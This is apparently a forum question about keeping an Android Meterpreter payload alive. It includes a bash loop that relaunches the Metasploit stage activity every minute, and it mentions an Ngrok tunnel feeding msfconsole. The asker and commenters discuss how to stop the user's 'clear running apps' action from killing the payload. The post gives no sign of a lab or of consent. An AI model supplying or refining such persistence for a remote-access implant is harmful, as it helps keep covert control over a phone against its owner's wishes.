# Prevent Android Meterpreter being killed when apps are closed

Tags: metasploit, bash

This is the bash script for my android payload

```
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 60
done
```

The issue is when I do *Clear running apps* in the mobile it doesn't get the connection back, it does the following...

[image: Issue]
Top Left Terminal is the bash script, Bottom left Terminal is the Ngrok port forwarding session, Right Terminal is the msfconsole (You can see the issue).

Is there a script that never quit the running MainActivity app even if I click *clear running apps* on mobile ? Am I missing anything ? What might be the issue ?

Comment: In words, what is happening, and what do you want to happen? The picture isn't entirely clear on which part you are concerned about.

Comment: I lose meterpreter connection when I click "clear running apps" on my mobile. Is there a way that doesn't allow MainActivity app to exit when that button is clicked ?

Comment: Doesn't your script restart it after a minute though? The issue would be with the payload/app, not the script, I'd imagine.

Comment: No the script doesn't restart.

Comment: do you mean that the script itself is killed?

Comment: Maybe the script killed itself...I just don't get meterpreter connection back....I turned off the internet and turned it on again, at that time I got my connection but when I clicked *clear all running apps* it just stopped working...I still didn't understand the issue

Comment: So now am thinking of a script that never quits the app even after clicking *Clear running apps* button on mobile.